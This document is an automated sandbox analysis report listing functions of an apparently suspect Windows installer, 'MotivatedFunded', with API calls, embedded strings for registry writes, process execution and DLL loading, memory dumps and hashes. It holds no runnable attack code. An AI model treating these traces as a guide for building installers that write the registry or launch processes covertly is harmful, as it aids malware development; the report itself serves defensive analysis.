                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                    Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                    • API String ID: 1641139501-220328614
                                                                    • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                    • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                    • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                    • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                    Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                    Strings
                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                    • String ID: created uninstaller: %d, "%s"
                                                                    • API String ID: 3294113728-3145124454
                                                                    • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                    • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                    • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                    • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                    Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3734993849-2769509956
                                                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                    Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                    Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                    Strings
                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                    • API String ID: 1033533793-945480824
                                                                    • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                    • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                    Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                    Strings
                                                                    • Exec: command="%s", xrefs: 00402241
                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                    • API String ID: 2014279497-3433828417
                                                                    • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                    • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                    Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                    • GetMessagePos.USER32 ref: 00404871
                                                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                    Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                    • MulDiv.KERNEL32(00019200,00000064,?), ref: 00403295
                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                    Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                    • wsprintfW.USER32 ref: 00404457
                                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s$@rD
                                                                    • API String ID: 3540041739-1813061909
                                                                    • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                    • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                    Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
